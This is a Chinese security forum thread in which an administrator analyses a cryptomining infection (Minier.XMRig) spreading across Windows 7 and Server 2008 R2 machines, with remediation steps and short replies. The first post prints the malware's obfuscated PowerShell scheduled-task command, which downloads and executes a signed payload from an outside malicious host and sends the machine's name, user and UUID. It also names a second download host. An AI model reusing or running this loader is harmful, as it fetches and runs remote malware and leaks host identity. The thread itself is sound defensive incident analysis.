Windows 7 和Windows 2008中的挖矿病毒，Minier.XMRig

显示全部楼层 · 发表于 2020-12-14 10:07:13

本帖最后由 fragranse 于 2020-12-14 10:10 编辑

刚刚编辑完毕，准备发出去，但是系统限制了帖子的大小，所以决定分开发吧。
发现是因为贴图太多的缘故，删除截图吧。

==============================

一台 Windows Server 2008 R2安装了 SEP 2014发现的病毒，但是其实是没有防住。
看名字应该是挖矿的？

分析了原理，应该是某台 Windows 7的电脑中毒之后，然后通过扫描发现其它 Windows 7 或者 Windows 2008 R2系统，进行攻击。
（Windows 10 和Windows Server 2012 以上均未受到攻击提示。）
遭受攻击的机器要么只装了 SEP，要么就未装SEP。
其它有安装360卫士的电脑均被拦截提醒。

这台Windows Server 2008 R2经过SEP查杀，但是无效果。
DNS会被修改为 8.8.8.8 9.9.9.9
cmd 文件和 powershell 文件也被篡改。
进程里面有大量的cmd 和powershell进程。
并发现木马下载网址：http://d.ackng.com

查看计划任务
1、有3个一样的计划任务，处于不同的位置，每小时定时启动：

执行的命令如下：
以powershell 运行，执行以下参数：
-w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?ipc_20201211?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))

2、有一个 “blackbal”的计划任务，但是执行命令已经找不到了。

3、有一个“lmbpqsk”的计划任务，每50分钟执行一次。
c:\windows\TEMP\lmbqsk.exe

暂时的解决办法是：
1、删除计划任务。
2、删除powershell和cmd的开机启动。

后期此机器肯定是下线不再使用了。

显示全部楼层 · 发表于 2020-12-14 10:51:20

WMI记得检查下，补丁记得修复下

显示全部楼层 · 发表于 2020-12-14 22:06:51

这主要针对服务器的吧

显示全部楼层 · 发表于 2021-1-11 13:25:10

大佬，能否把分析文档给我一份，学习一下。1186744605@qq.com

显示全部楼层 · 发表于 2021-1-11 15:10:52

https://www.virustotal.com/gui/f ... 13facab4f/detection

[分析报告] Windows 7 和Windows 2008中的挖矿病毒，Minier.XMRig